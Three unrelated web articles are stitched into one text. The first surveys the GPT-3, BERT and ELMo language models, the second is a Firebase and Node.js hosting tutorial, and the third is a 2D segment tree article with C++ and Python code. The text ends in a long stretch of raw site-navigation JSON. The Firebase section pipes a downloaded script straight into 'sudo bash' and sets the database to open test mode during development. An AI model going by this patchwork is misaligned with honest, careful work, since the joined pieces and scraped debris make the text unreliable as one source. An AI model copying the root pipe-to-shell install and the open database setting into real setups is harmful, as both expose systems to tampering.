Here are the three pre-trained network series you can use for natural language processing tasks ranging from text classification, sentiment analysis, text generation, word embedding, and machine translation, and so on:

Open AI GPT Series
BERT Variations
ELMo Variations

While BERT and the OpenAI GPT models are based on the transformer network, ELMo takes advantage of a bidirectional LSTM network.

Ok, let's dive into them one by one.

There are three generations of GPT models created by OpenAI. GPT, which stands for Generative Pre-trained Transformer, is an autoregressive language model that uses deep learning to produce human-like text. Currently, the most advanced GPT available is GPT-3, and the most complex version of GPT-3 has over 175 billion parameters. Before the release of GPT-3 in May 2020, the most complex pre-trained NLP model was Microsoft's Turing NLG.

GPT-3 can create very realistic text, which is sometimes difficult to distinguish from human-generated text. That's why the engineers warned of GPT-3's potential dangers and called for risk mitigation research. (The original post embeds a video showing 14 cool apps built on GPT-3.)

As opposed to most other pre-trained NLP models, OpenAI chose not to share GPT-3's source code. Instead, they allowed invitation-based API access, and you can apply for a license by visiting their website. Check it out: openai.com

On September 22, 2020, Microsoft announced it had licensed "exclusive" use of GPT-3. Therefore, while others have to rely on the API to receive output, Microsoft has control of the source code. Here is brief info about its size and performance:

Year Published: 2020 (GPT-3)
Size: Unknown
Q&A: F1-Scores of 81.5 in zero-shot, 84.0 in one-shot, 85.0 in few-shot learning
TriviaQA: Accuracy of 64.3%
LAMBADA: Accuracy of 76.2%
Number of Parameters: 175,000,000,000

BERT stands for Bidirectional Encoder Representations from Transformers, and it is a state-of-the-art machine learning model used for NLP tasks. Jacob Devlin and his colleagues developed BERT at Google in 2018. Devlin and his colleagues trained BERT on English Wikipedia (2.5B words) and BooksCorpus (0.8B words) and achieved the best accuracies for some of the NLP tasks in 2018. There are two pre-trained general BERT variations: the base model is a 12-layer, 768-hidden, 12-heads, 110M-parameter neural network architecture, whereas the large model is a 24-layer, 1024-hidden, 16-heads, 340M-parameter neural network architecture. (The original post includes a figure visualizing the BERT network, created by Devlin et al.)

Even though BERT seems inferior to GPT-3, the availability of the source code to the public makes the model much more popular among developers. You can easily load a BERT variation for your NLP task using Hugging Face's Transformers library. Besides, there are several BERT variations, such as the original BERT, RoBERTa (by Facebook), DistilBERT, and XLNet. Here is a helpful TDS post on their comparison: towardsdatascience.com

Here is brief info about BERT's size and performance:

Year Published: 2018
Size: 440 MB (BERT Baseline)
GLUE Benchmark: Average accuracy of 82.1%
SQuAD v2.0: Accuracy of 86.3%
Number of Parameters: 110,000,000–340,000,000
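Since the BERT checkpoints are public, loading one really does take only a few lines. Here is a minimal Python sketch with Hugging Face's Transformers library (assuming the PyTorch backend is installed; the checkpoint name and sample sentence are illustrative):

from transformers import AutoTokenizer, AutoModel

# "bert-base-uncased" is one of the public BERT checkpoints on the hub.
tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
model = AutoModel.from_pretrained("bert-base-uncased")

inputs = tokenizer("I like cloud computing.", return_tensors="pt")
outputs = model(**inputs)

# Contextual embeddings: (batch, tokens, 768 hidden units for the base model)
print(outputs.last_hidden_state.shape)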
ELMo, short for Embeddings from Language Models, is a word embedding system for representing words and phrases as vectors. ELMo models the syntax and semantics of words as well as their linguistic context, and it was developed by the Allen Institute for AI. There are several variations of ELMo, and the most complex ELMo model (ELMo 5.5B) was trained on a dataset of 5.5B tokens consisting of Wikipedia (1.9B) and all of the monolingual news crawl data from WMT 2008–2012 (3.6B). While both the BERT and GPT models are based on transformer networks, ELMo models are based on bi-directional LSTM networks.

Here is brief info about ELMo's size and performance:

Year Published: 2018
Size: 357 MB (ELMo 5.5B)
SQuAD: Accuracy of 85.8%
NER: Accuracy of 92.2%
Number of Parameters: 93,600,000

Just like the BERT models, we also have access to ELMo's source code. You can download the different variations of ELMo from AllenNLP's website: allennlp.org

Although there are several other pre-trained NLP models available in the market (e.g., GloVe), GPT, BERT, and ELMo are currently the best pre-trained models out there. Since this post aims to introduce these models, we will not have a code-along tutorial. But I will share several tutorials where we exploit these very advanced pre-trained NLP models.

In a world where we have easy access to state-of-the-art neural network models, trying to build your own model with limited resources is like trying to reinvent the wheel. It is pointless. Instead, try to work with these trained models, add a couple of new layers on top considering your particular natural language processing task, and train. The results will be much more successful than with a model you build from scratch.

If you would like to have access to the full code on Google Colab and to my latest content, subscribe to the mailing list: ✉️ Subscribe Now

If you are interested in deep learning, also check out the guide to my content on artificial intelligence.
Host a dynamic website on Google Firebase using Node.js and Cloud Firestore DB | by Tushar Chand Kapoor | Towards Data Science
Tushar Kapoor: (https://www.tusharck.com/)
Demo Git URL: https://github.com/tusharck/firebase-demo

Firebase is a comprehensive app platform built on Google's infrastructure; therefore, it provides a secure, fast, free (paid options are also available for additional resources) and easy way to host your content on the web or in mobile applications.

It gives a free custom domain & SSL (SSL provides a standard security layer for https connections).
Cloud Firestore: a flexible and scalable database for realtime data sync across client apps.
Other features: Cloud Functions, Cloud Messaging (FCM), Crashlytics, Dynamic Links, Hosting, ML Kit, Storage, Performance Monitoring, Predictions and Test Lab (the functionality and resources of these products can be increased by buying a paid plan, but the free-tier services are very good; to look at the plans check Firebase Pricing).
Automatic scaling of resources.

1. Google Account
If you don't have a Google account, you need to sign up for one. You can do so by going to https://accounts.google.com/SignUp.

2. Node.js and npm
Mac/Windows: You can download the installer from https://nodejs.org/en/download/.
Linux: Follow the steps below to install Node.js:
1. Open a terminal
2. Run the following commands:

sudo apt-get install curl
curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -
sudo apt install nodejs

Note: I have used setup_13.x because at the time of the tutorial the latest version was 13; you can check the latest release by going to https://nodejs.org/en/.

To check if Node.js and npm are successfully installed, run the following commands, which will output the versions installed:

node -v
npm -v

3. Firebase-CLI (Command-Line Interface)
These are the tools for managing, viewing, and deploying Firebase projects.

npm install -g firebase-tools

Next, create the Firebase project:

1. Go to https://firebase.google.com and Sign In from the top right corner.
2. Click on Go to console, from the top right corner.
3. Then click on Create project, as shown below.
4. The next thing is to enter the name of your project, and press continue.
5. Press continue to enable Google Analytics for your Firebase project (if you don't want it, then check to disable).
6. Select the nearest location for Google Analytics.
7. Click on Create Project, and wait for it to load. Then you will see something like below.

1. Open a command-line/terminal, then create and go to a new directory.

mkdir my-firebase-project
cd my-firebase-project

2. To host a website on Firebase, log in to Firebase using the following command. After you run the command, a browser window will open asking you to log in to Firebase using your Google credentials. Enter the credentials there and Firebase will sign into your system.
firebase login

1. Now we have to initialize the project that we created on the Firebase console into the system. To do so, run the command below.

firebase init

2. Press the down key, then select two things by pressing the space bar key:
Functions
Hosting
Then press Enter to continue.

3. Then select Use an existing project, then press enter.

4. Press enter on the my-firebase-project or the project name you used.

5. Select Javascript and press enter.

6. You can say No to "Do you want to use ESLint to catch probable bugs and enforce style?"

7. Type Yes for installing the dependencies with npm.

8. Here we have to do two tasks:
You have to select the directory in which your website and assets will reside. By default it is public; you can press enter to continue, or you can change it to your desired directory name.
Type Yes for the single-page app option so that your dynamic URLs can be redirected to their proper destination.

9. Test the Firebase app on your local system by running the following command, then go to http://localhost:5000 to see your basic website running.

firebase serve --only hosting,functions

You should see something like this below after opening the http://localhost:5000 URL.

10. Close the server from the terminal.

Now install the Node.js dependencies:

1. Switch inside the functions directory; to do so use:

cd functions

2. Install Express. It is a minimal and flexible Node.js web application framework.

npm i express --save

3. Install Handlebars. It is a templating engine for Node.js used for the dynamic front end of the website.

npm i handlebars --save

4. Install consolidate.

npm i consolidate --save

5. Create a folder named views inside the functions folder, in which we will store all the frontend code.

mkdir views

6. Switch back to the main directory by running the following command:

cd ..

Next, set up Cloud Firestore:

1. Go to https://console.firebase.google.com/.
2. Select your project.
3. Select Database from the pane on the left.
4. Click on Create Database.
5. Select Start in test mode, because otherwise you will not be able to access the database from your system. We will change this setting once we are done with the development of the website. Then click Next after doing so.
6. Select the location of your Firestore DB.
Note: After you set this location, you cannot change it later.

Then add the sample data:

1. Click on Start collection.
2. Enter the Collection ID; you can use sample for now.
3. Enter the sample data. Enter sample_doc as the Document ID, Heading as the Field, and I like Cloud as the Value. Then click Save.

We will split this portion into two parts: in the first part, we will see how to fetch data from Firestore and use it in the website; in the second part, we will see how to submit the form data.

First, we will download the credentials to access Firestore:

1. Go to https://console.firebase.google.com/.
We need to define some of the libraries that we want to use in our application. These are the same libraries that we installed earlier. const functions = require('firebase-functions');const express = require('express');const engines = require('consolidate');var hbs = require('handlebars');const admin = require('firebase-admin'); 3. Here we set a few things: Initialize the app using express. We will set our engine as handlebars. Then we will tell the express that our front end code is going to be inside the views folder. const app = express();app.engine('hbs',engines.handlebars);app.set('views','./views');app.set('view engine','hbs'); 4. Authorize your application to access your Firestore DB.Note: 1. Change YOUR_SDK_NAME.json with the file you downloaded for credentials to access Firestore.2. Change the database URL to your database URL. To see the URL you can to Settings > Service Account. var serviceAccount = require("./YOUR_SDK_NAME.json");admin.initializeApp({credential: admin.credential.cert(serviceAccount),databaseURL: "https://myfirebaseproject-bx54dasx3.firebaseio.com"}); 5. Function to fetch data from Firestore. Collection ID is sample. Document ID is sample_doc. We defined the above while entering the sample data. async function getFirestore(){const firestore_con = await admin.firestore();const writeResult = firestore_con.collection('sample').doc('sample_doc').get().then(doc => {if (!doc.exists) { console.log('No such document!'); }else {return doc.data();}}).catch(err => { console.log('Error getting document', err);});return writeResult} Note: We use async because we have to wait for the promise operation to be completed between the Database and our website. 6. Create the route and send the result to the front end. app.get('/',async (request,response) =>{var db_result = await getFirestore();response.render('index',{db_result});});exports.app = functions.https.onRequest(app); 7. Create index.hbs inside the views folder.Note: .hbs is a handelbars file 8. Write this basic HTML code inside index.hbs to see the fetched result. <html> <body> <h1>{{db_result.Heading}}</h1> </body></html> Note: {{db_result.Heading}} , db_result is the variable that was passed from the backend. .Heading is the Field inside the document that we defined while entering the data in the Firestore DB. 9. Open firebase.json and change “destination”: “/index.html” to "function":"app". 10. Delete index.html inside the public folder, deleting this is very important. If you don’t delete this it will always pick this file and our backend code will be useless. 11. Test the firebase app on your local system by running the following command. Then go to http://localhost:5000 to see your basic website running. firebase serve --only hosting,functions 12. Close the server from the terminal. Here we will insert data from our website into Firestore. 1. Create Another Collection named form_data, in which we will insert the form data. Note: It will ask you to enter a document as well to create the collection to enter any sample value. 2. Go to http://localhost:5000 after running the command below to test on your local server. firebase serve --only hosting,functions 3. Add the HTML code to make a sample form inside index.hbs. 
Here we will insert data from our website into Firestore.

1. Create another collection named form_data, in which we will insert the form data.
Note: It will ask you to enter a document as well to create the collection; enter any sample value.

2. Go to http://localhost:5000 after running the command below to test on your local server.

firebase serve --only hosting,functions

3. Add the HTML code to make a sample form inside index.hbs.

<html>
  <body>
    <h1>{{db_result.Heading}}</h1>
    <form action="/insert_data" method="post">
      <fieldset>
        <legend>Sample Form</legend>
        First name:<br>
        <input type="text" name="firstname">
        <br>
        Last name:<br>
        <input type="text" name="lastname">
        <br><br>
        <input type="submit" value="Submit">
      </fieldset>
    </form>
  </body>
</html>

action="/insert_data" is the path that we will define inside our function. After refreshing the page, you should see the sample form.

4. Inside index.js, add the code which inserts data into Firestore.

async function insertFormData(request) {
  // Add a new document with an auto-generated ID to the form_data collection.
  const writeResult = await admin.firestore().collection('form_data').add({
    firstname: request.body.firstname,
    lastname: request.body.lastname
  })
  .then(function() {
    console.log("Document successfully written!");
  })
  .catch(function(error) {
    console.error("Error writing document: ", error);
  });
}

5. Inside index.js, define the route to which the HTML form will send a post request.

app.post('/insert_data', async (request, response) => {
  var insert = await insertFormData(request);
  response.sendStatus(200);
});

6. Insert some sample data inside the form to test it.

7. After pressing submit, you should see the response OK displayed on the webpage.

8. Go to https://console.firebase.google.com/, then to the Database section. You should see the inserted form data.

Now it is time to deploy:

1. We need to change a piece of code which we used for authentication, because when you deploy online, Firebase takes care of authentication. Inside index.js, remove the following code:

var serviceAccount = require("./YOUR_SDK_NAME.json");
admin.initializeApp({
  credential: admin.credential.cert(serviceAccount),
  databaseURL: "https://myfirebaseproject-bx54dasx3.firebaseio.com"
});

Instead, inside index.js, insert this into your code:

admin.initializeApp(functions.config().firebase);

Here we are telling Firebase to take the authentication information from the config that exists when you deploy.

2. On the terminal, inside your website directory, run the following command:

firebase deploy

It will take a few minutes, but after it you should see something like this:

3. Go to the Hosting URL provided by Firebase, as shown in the image above.

Congrats! You are done with hosting a dynamic website on Firebase.

To connect a custom domain:

1. Buy a domain from any provider, like GoDaddy or any other you like.
2. Go to Hosting from the pane on the left.
3. Click on Connect Domain.
4. Enter the domain here.
5. Follow the verification instructions.

Disclaimer:
The Terms of Service for Firebase services apply.
Firebase and its services are a product of Google; nothing in this article suggests otherwise.
This article is meant for education purposes.
Two Dimensional Segment Tree | Sub-Matrix Sum - GeeksforGeeks
Difficulty Level : Hard

Given a rectangular matrix M[0...n-1][0...m-1], queries ask for the sum / minimum / maximum over some sub-rectangle M[a...b][e...f], as well as for modification of individual matrix elements (i.e. M[x][y] = p). Such sub-matrix queries can also be answered using a Two Dimensional Binary Indexed Tree. In this article, we focus on solving sub-matrix queries using a two dimensional segment tree. A two dimensional segment tree is nothing but a segment tree of segment trees.

Prerequisite : Segment Tree – Sum of given range

Algorithm : We build the two-dimensional segment tree by the following principle:

1. In the first step, we construct an ordinary one-dimensional segment tree, working only on the first coordinate, say 'x', with 'y' held constant. Here, a node does not store a single number as in the one-dimensional segment tree, but an entire segment tree.

2. In the second step, we combine these values: instead of combining single elements as in the first step, we merge the segment trees obtained there.

Consider the below example. Suppose we have to find the sum of all numbers inside the highlighted red area.

Step 1 : We first create the segment tree of each strip along the y-axis. We represent each segment tree as an array where the children of node n are 2n and 2n + 1, for n > 0.

Segment Tree for strip y = 1
Segment Tree for strip y = 2
Segment Tree for strip y = 3
Segment Tree for strip y = 4

Step 2 : In this step, we create the segment tree for the whole rectangular matrix, whose base nodes are the strip trees built above. The task is to merge the above segment trees.

Sum Query : Thanks to Sahil Bansal for contributing this image.

Processing Query : We answer a two-dimensional query by the following principle: first break the query along the first coordinate, and whenever a vertex of that tree is fully covered by the query range, run the corresponding query on the segment tree of the second coordinate stored at that vertex. This works in time O(log n * log m), because the descent along the first coordinate visits O(log n) vertices, and each of them issues one query on an ordinary segment tree along the second coordinate.

Modification Query : We want to modify the tree in accordance with a change of an element, M[x][y] = p. It is clear that changes occur only in those vertices of the first segment tree that cover the coordinate x, and, inside the trees stored at those vertices, only in the nodes that cover the coordinate y. Therefore, the modification is not very different from the one-dimensional case: we first descend along the first coordinate, and then along the second.

Output for the highlighted area will be 25: with 1-based indices the query covers rows 2..3 and columns 2..3 of the example matrix, i.e. 6 + 7 + 7 + 5 = 25.
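Before the full implementation, here is a minimal sketch of Step 1 in isolation: building the 1D segment tree of a single strip (row y = 2 of the example matrix), using the same 2n / 2n + 1 array layout. The names buildStrip, tree and strip are illustrative and do not appear in the implementation that follows.

// Sketch of Step 1 only: build the segment tree of one strip.
#include <iostream>
using namespace std;

int tree[8];                     // 2 * 4 nodes; index 0 is unused
int strip[4] = { 5, 6, 7, 8 };   // the strip y = 2 of the example

void buildStrip(int low, int high, int pos)
{
    if (low == high) {           // leaf: copy the element
        tree[pos] = strip[low];
        return;
    }
    int mid = (low + high) / 2;
    buildStrip(low, mid, 2 * pos);            // left child
    buildStrip(mid + 1, high, 2 * pos + 1);   // right child
    tree[pos] = tree[2 * pos] + tree[2 * pos + 1]; // merge = sum
}

int main()
{
    buildStrip(0, 3, 1);
    cout << tree[1] << endl;     // prints 26, the sum of the strip
    return 0;
}

In the 2D structure below, one such array is built per strip (ini_seg), and Step 2 then merges these arrays node by node into the outer tree (fin_seg).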
Below is the implementation of the above approach :

C++

// C++ program for implementation
// of 2D segment tree.
#include <iostream>
using namespace std;

// Segment trees of the individual strips:
// one 1D segment tree per row of the matrix.
int ini_seg[1000][1000] = { 0 };

// Final 2D segment tree: a segment tree whose
// nodes are the strip trees stored in ini_seg.
int fin_seg[1000][1000] = { 0 };

// Rectangular matrix.
int rect[4][4] = { { 1, 2, 3, 4 },
                   { 5, 6, 7, 8 },
                   { 1, 7, 5, 9 },
                   { 3, 0, 6, 2 } };

// Size of the x coordinate.
int sz = 4;

/* A recursive function that constructs the initial
   segment tree for one strip of rect[][]. 'pos' is the
   index of the current node in the strip's tree and
   'strip' is the y-axis index of the strip. */
void segment(int low, int high, int pos, int strip)
{
    if (high == low) {
        ini_seg[strip][pos] = rect[strip][low];
    }
    else {
        int mid = (low + high) / 2;
        segment(low, mid, 2 * pos, strip);
        segment(mid + 1, high, 2 * pos + 1, strip);
        ini_seg[strip][pos] = ini_seg[strip][2 * pos]
                              + ini_seg[strip][2 * pos + 1];
    }
}

/* A recursive function that constructs the final
   segment tree over the strip trees in ini_seg[][]. */
void finalSegment(int low, int high, int pos)
{
    if (high == low) {
        for (int i = 1; i < 2 * sz; i++)
            fin_seg[pos][i] = ini_seg[low][i];
    }
    else {
        int mid = (low + high) / 2;
        finalSegment(low, mid, 2 * pos);
        finalSegment(mid + 1, high, 2 * pos + 1);
        for (int i = 1; i < 2 * sz; i++)
            fin_seg[pos][i] = fin_seg[2 * pos][i]
                              + fin_seg[2 * pos + 1][i];
    }
}

/* Return the sum of the elements in range x1..x2 of the
   strip tree stored at row 'node' of fin_seg[][]. 'pos'
   is the index of the current node in that tree. */
int finalQuery(int pos, int start, int end,
               int x1, int x2, int node)
{
    if (x2 < start || end < x1) {
        return 0;
    }
    if (x1 <= start && end <= x2) {
        return fin_seg[node][pos];
    }
    int mid = (start + end) / 2;
    int p1 = finalQuery(2 * pos, start, mid, x1, x2, node);
    int p2 = finalQuery(2 * pos + 1, mid + 1, end,
                        x1, x2, node);
    return (p1 + p2);
}

/* Descend the outer tree on the y coordinate and call
   finalQuery() on the x coordinate for every node that
   is fully covered by y1..y2. */
int query(int pos, int start, int end,
          int y1, int y2, int x1, int x2)
{
    if (y2 < start || end < y1) {
        return 0;
    }
    if (y1 <= start && end <= y2) {
        return finalQuery(1, 1, sz, x1, x2, pos);
    }
    int mid = (start + end) / 2;
    int p1 = query(2 * pos, start, mid, y1, y2, x1, x2);
    int p2 = query(2 * pos + 1, mid + 1, end,
                   y1, y2, x1, x2);
    return (p1 + p2);
}

/* A recursive function to update the nodes that cover a
   given index. pos --> index of the current node in the
   strip tree at row 'node' of fin_seg[][]; x --> index of
   the element to be updated; val --> the new value. */
void finalUpdate(int pos, int low, int high,
                 int x, int val, int node)
{
    if (low == high) {
        fin_seg[node][pos] = val;
    }
    else {
        int mid = (low + high) / 2;
        if (low <= x && x <= mid) {
            finalUpdate(2 * pos, low, mid, x, val, node);
        }
        else {
            finalUpdate(2 * pos + 1, mid + 1, high,
                        x, val, node);
        }
        fin_seg[node][pos] = fin_seg[node][2 * pos]
                             + fin_seg[node][2 * pos + 1];
    }
}

/* Descend the outer tree on the y coordinate, call
   finalUpdate() on the x coordinate, and re-merge the
   two child strip trees of every visited node. */
void update(int pos, int low, int high,
            int x, int y, int val)
{
    if (low == high) {
        finalUpdate(1, 1, sz, x, val, pos);
    }
    else {
        int mid = (low + high) / 2;
        if (low <= y && y <= mid) {
            update(2 * pos, low, mid, x, y, val);
        }
        else {
            update(2 * pos + 1, mid + 1, high, x, y, val);
        }
        // merge every node of the two child strip trees
        for (int i = 1; i < 2 * sz; i++)
            fin_seg[pos][i] = fin_seg[2 * pos][i]
                              + fin_seg[2 * pos + 1][i];
    }
}

// Driver program to test above functions
int main()
{
    int low = 0;
    int high = 3;

    // Build the 1D segment tree of every strip
    // on the x coordinate.
    for (int strip = 0; strip < 4; strip++)
        segment(low, high, 1, strip);

    // Merge the strip trees into the 2D segment tree.
    finalSegment(low, high, 1);

    /* Query the sum of the sub-rectangle
       (y1, y2) = (2, 3), (x1, x2) = (2, 3),
       update the element at (x, y) = (2, 3) to 100,
       then repeat the query. */
    cout << "The sum of the submatrix (y1, y2)->(2, 3), "
         << "(x1, x2)->(2, 3) is "
         << query(1, 1, 4, 2, 3, 2, 3) << endl;

    update(1, 1, 4, 2, 3, 100);

    cout << "The sum of the submatrix (y1, y2)->(2, 3), "
         << "(x1, x2)->(2, 3) is "
         << query(1, 1, 4, 2, 3, 2, 3) << endl;

    return 0;
}

Python3

# Python 3 program for implementation
# of 2D segment tree.

# Segment trees of the individual strips:
# one 1D segment tree per row of the matrix.
ini_seg = [[0 for x in range(1000)] for y in range(1000)]

# Final 2D segment tree: a segment tree whose
# nodes are the strip trees stored in ini_seg.
fin_seg = [[0 for x in range(1000)] for y in range(1000)]

# Rectangular matrix.
rect = [[1, 2, 3, 4],
        [5, 6, 7, 8],
        [1, 7, 5, 9],
        [3, 0, 6, 2]]

# Size of the x coordinate.
size = 4

# A recursive function that constructs the initial
# segment tree for one strip of rect[][]. 'pos' is the
# index of the current node in the strip's tree and
# 'strip' is the y-axis index of the strip.
def segment(low, high, pos, strip):
    if high == low:
        ini_seg[strip][pos] = rect[strip][low]
    else:
        mid = (low + high) // 2
        segment(low, mid, 2 * pos, strip)
        segment(mid + 1, high, 2 * pos + 1, strip)
        ini_seg[strip][pos] = (ini_seg[strip][2 * pos] +
                               ini_seg[strip][2 * pos + 1])

# A recursive function that constructs the final
# segment tree over the strip trees in ini_seg[][].
def finalSegment(low, high, pos):
    if high == low:
        for i in range(1, 2 * size):
            fin_seg[pos][i] = ini_seg[low][i]
    else:
        mid = (low + high) // 2
        finalSegment(low, mid, 2 * pos)
        finalSegment(mid + 1, high, 2 * pos + 1)
        for i in range(1, 2 * size):
            fin_seg[pos][i] = (fin_seg[2 * pos][i] +
                               fin_seg[2 * pos + 1][i])

# Return the sum of the elements in range x1..x2 of the
# strip tree stored at row 'node' of fin_seg[][]. 'pos'
# is the index of the current node in that tree.
def finalQuery(pos, start, end, x1, x2, node):
    if x2 < start or end < x1:
        return 0
    if x1 <= start and end <= x2:
        return fin_seg[node][pos]
    mid = (start + end) // 2
    p1 = finalQuery(2 * pos, start, mid, x1, x2, node)
    p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node)
    return p1 + p2

# Descend the outer tree on the y coordinate and call
# finalQuery() on the x coordinate for every node that
# is fully covered by y1..y2.
def query(pos, start, end, y1, y2, x1, x2):
    if y2 < start or end < y1:
        return 0
    if y1 <= start and end <= y2:
        return finalQuery(1, 1, size, x1, x2, pos)
    mid = (start + end) // 2
    p1 = query(2 * pos, start, mid, y1, y2, x1, x2)
    p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2)
    return p1 + p2

# A recursive function to update the nodes that cover a
# given index: x is the index to update, val the new value.
def finalUpdate(pos, low, high, x, val, node):
    if low == high:
        fin_seg[node][pos] = val
    else:
        mid = (low + high) // 2
        if low <= x and x <= mid:
            finalUpdate(2 * pos, low, mid, x, val, node)
        else:
            finalUpdate(2 * pos + 1, mid + 1, high, x, val, node)
        fin_seg[node][pos] = (fin_seg[node][2 * pos] +
                              fin_seg[node][2 * pos + 1])

# Descend the outer tree on the y coordinate, call
# finalUpdate() on the x coordinate, and re-merge the
# two child strip trees of every visited node.
def update(pos, low, high, x, y, val):
    if low == high:
        finalUpdate(1, 1, size, x, val, pos)
    else:
        mid = (low + high) // 2
        if low <= y and y <= mid:
            update(2 * pos, low, mid, x, y, val)
        else:
            update(2 * pos + 1, mid + 1, high, x, y, val)
        # merge every node of the two child strip trees
        for i in range(1, 2 * size):
            fin_seg[pos][i] = (fin_seg[2 * pos][i] +
                               fin_seg[2 * pos + 1][i])

# Driver Code
if __name__ == "__main__":
    low = 0
    high = 3

    # Build the 1D segment tree of every strip
    # on the x coordinate.
    for strip in range(4):
        segment(low, high, 1, strip)

    # Merge the strip trees into the 2D segment tree.
    finalSegment(low, high, 1)

    # Query the sub-rectangle (y1, y2) = (2, 3),
    # (x1, x2) = (2, 3), update the element at
    # (x, y) = (2, 3) to 100, then repeat the query.
    print("The sum of the submatrix (y1, y2)->(2, 3),",
          "(x1, x2)->(2, 3) is",
          query(1, 1, 4, 2, 3, 2, 3))

    update(1, 1, 4, 2, 3, 100)

    print("The sum of the submatrix (y1, y2)->(2, 3),",
          "(x1, x2)->(2, 3) is",
          query(1, 1, 4, 2, 3, 2, 3))

Output :

The sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 25
The sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 118

Time Complexity :
Processing query : O(log n * log m)
Modification query : O(2 * n * log n * log m)

Space Complexity : O(4 * m * n)
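The problem statement also mentions minimum / maximum queries. The same structure supports them: only the merge operation and the identity value returned for a disjoint range change, while the recursion stays the same. Below is a minimal one-dimensional sketch of the range-minimum variant on a single strip of the example matrix; in the full 2D version the same two substitutions would be made in finalSegment(), finalQuery() and the outer query()/update(). The names build, rangeMin, tree and strip are illustrative and not part of the article's code.

// Sketch: range-minimum variant of the strip tree.
#include <algorithm>
#include <climits>
#include <iostream>
using namespace std;

int tree[8];                    // 2 * 4 nodes; index 0 is unused
int strip[4] = { 1, 7, 5, 9 };  // the strip y = 3 of the example

void build(int low, int high, int pos)
{
    if (low == high) {
        tree[pos] = strip[low];
        return;
    }
    int mid = (low + high) / 2;
    build(low, mid, 2 * pos);
    build(mid + 1, high, 2 * pos + 1);
    // merge = min instead of sum
    tree[pos] = min(tree[2 * pos], tree[2 * pos + 1]);
}

int rangeMin(int pos, int start, int end, int l, int r)
{
    if (r < start || end < l)
        return INT_MAX;         // identity for min (was 0 for sum)
    if (l <= start && end <= r)
        return tree[pos];
    int mid = (start + end) / 2;
    return min(rangeMin(2 * pos, start, mid, l, r),
               rangeMin(2 * pos + 1, mid + 1, end, l, r));
}

int main()
{
    build(0, 3, 1);
    // minimum of { 7, 5 } (0-based indices 1..2) -> prints 5
    cout << rangeMin(1, 0, 3, 1, 2) << endl;
    return 0;
}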
"s": 6272, "text": "C++" }, { "code": null, "e": 6281, "s": 6276, "text": "Java" }, { "code": null, "e": 6288, "s": 6281, "text": "Python" }, { "code": null, "e": 6291, "s": 6288, "text": "C#" }, { "code": null, "e": 6302, "s": 6291, "text": "JavaScript" }, { "code": null, "e": 6309, "s": 6302, "text": "jQuery" }, { "code": null, "e": 6313, "s": 6309, "text": "SQL" }, { "code": null, "e": 6317, "s": 6313, "text": "PHP" }, { "code": null, "e": 6323, "s": 6317, "text": "Scala" }, { "code": null, "e": 6328, "s": 6323, "text": "Perl" }, { "code": null, "e": 6340, "s": 6328, "text": "Go Language" }, { "code": null, "e": 6345, "s": 6340, "text": "HTML" }, { "code": null, "e": 6349, "s": 6345, "text": "CSS" }, { "code": null, "e": 6356, "s": 6349, "text": "Kotlin" }, { "code": null, "e": 6402, "s": 6356, "text": "ML & Data ScienceMachine LearningData Science" }, { "code": null, "e": 6419, "s": 6402, "text": "Machine Learning" }, { "code": null, "e": 6432, "s": 6419, "text": "Data Science" }, { "code": null, "e": 6599, "s": 6432, "text": "CS SubjectsMathematicsOperating SystemDBMSComputer NetworksComputer Organization and ArchitectureTheory of ComputationCompiler DesignDigital LogicSoftware Engineering" }, { "code": null, "e": 6611, "s": 6599, "text": "Mathematics" }, { "code": null, "e": 6628, "s": 6611, "text": "Operating System" }, { "code": null, "e": 6633, "s": 6628, "text": "DBMS" }, { "code": null, "e": 6651, "s": 6633, "text": "Computer Networks" }, { "code": null, "e": 6690, "s": 6651, "text": "Computer Organization and Architecture" }, { "code": null, "e": 6712, "s": 6690, "text": "Theory of Computation" }, { "code": null, "e": 6728, "s": 6712, "text": "Compiler Design" }, { "code": null, "e": 6742, "s": 6728, "text": "Digital Logic" }, { "code": null, "e": 6763, "s": 6742, "text": "Software Engineering" }, { "code": null, "e": 6938, "s": 6763, "text": "GATEGATE Computer Science NotesLast Minute NotesGATE CS Solved PapersGATE CS Original Papers and Official KeysGATE 2021 DatesGATE CS 2021 SyllabusImportant Topics for GATE CS" }, { "code": null, "e": 6966, "s": 6938, "text": "GATE Computer Science Notes" }, { "code": null, "e": 6984, "s": 6966, "text": "Last Minute Notes" }, { "code": null, "e": 7006, "s": 6984, "text": "GATE CS Solved Papers" }, { "code": null, "e": 7048, "s": 7006, "text": "GATE CS Original Papers and Official Keys" }, { "code": null, "e": 7064, "s": 7048, "text": "GATE 2021 Dates" }, { "code": null, "e": 7086, "s": 7064, "text": "GATE CS 2021 Syllabus" }, { "code": null, "e": 7115, "s": 7086, "text": "Important Topics for GATE CS" }, { "code": null, "e": 7189, "s": 7115, "text": "Web TechnologiesHTMLCSSJavaScriptAngularJSReactJSNodeJSBootstrapjQueryPHP" }, { "code": null, "e": 7194, "s": 7189, "text": "HTML" }, { "code": null, "e": 7198, "s": 7194, "text": "CSS" }, { "code": null, "e": 7209, "s": 7198, "text": "JavaScript" }, { "code": null, "e": 7219, "s": 7209, "text": "AngularJS" }, { "code": null, "e": 7227, "s": 7219, "text": "ReactJS" }, { "code": null, "e": 7234, "s": 7227, "text": "NodeJS" }, { "code": null, "e": 7244, "s": 7234, "text": "Bootstrap" }, { "code": null, "e": 7251, "s": 7244, "text": "jQuery" }, { "code": null, "e": 7255, "s": 7251, "text": "PHP" }, { "code": null, "e": 7318, "s": 7255, "text": "Software DesignsSoftware Design PatternsSystem Design Tutorial" }, { "code": null, "e": 7343, "s": 7318, "text": "Software Design Patterns" }, { "code": null, "e": 7366, "s": 7343, "text": "System Design Tutorial" }, { "code": null, "e": 7923, "s": 7366, 
